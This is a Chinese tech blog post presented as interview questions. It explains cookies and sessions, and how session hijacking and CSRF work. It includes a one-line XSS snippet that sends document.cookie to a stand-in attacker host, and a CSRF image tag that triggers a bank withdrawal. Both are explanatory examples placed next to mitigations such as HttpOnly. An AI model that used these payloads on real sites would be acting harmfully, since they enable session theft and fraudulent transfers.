温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

python爬虫Cookie的面试题示例

发布时间:2020-12-01 09:32:15 来源:亿速云 阅读:128 作者:小新 栏目:编程语言

小编给大家分享一下python爬虫Cookie的面试题示例,希望大家阅读完这篇文章后大所收获,下面让我们一起去探讨吧!

1.Cookie和Session关系

都是为了实现客户端与服务端交互而产出

Cookie是保存在客户端,缺点易伪造、不安全

Session是保存在服务端,会消耗服务器资源

Session实现有两种方式:Cookie和URL重写

2.Cookie带来的安全性问题

会话劫持和XSS:在Web应用中,Cookie常用来标记用户或授权会话。因此,如果Web应用的Cookie被窃取,可能导致授权用户的会话受到攻击。常用的窃取Cookie的方法有利用社会工程学攻击和利用应用程序漏洞进行XSS攻击。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly类型的Cookie由于阻止了JavaScript对其的访问性而能在一定程度上缓解此类攻击。

跨站请求伪造(CSRF)维基百科已经给了一个比较好的CSRF例子。比如在不安全聊天室或论坛上的一张图片,它实际上是一个给你银行服务器发送提现的请求:<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">当你打开含有了这张图片的HTML页面时,如果你之前已经登录了你的银行帐号并且Cookie仍然有效(还没有其它验证步骤),你银行里的钱很可能会被自动转走。

解决CSRF的办法有:隐藏域验证码、确认机制、较短的Cookie生命周期等

看完了这篇文章,相信你对python爬虫Cookie的面试题示例有了一定的了解,想了解更多相关知识,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI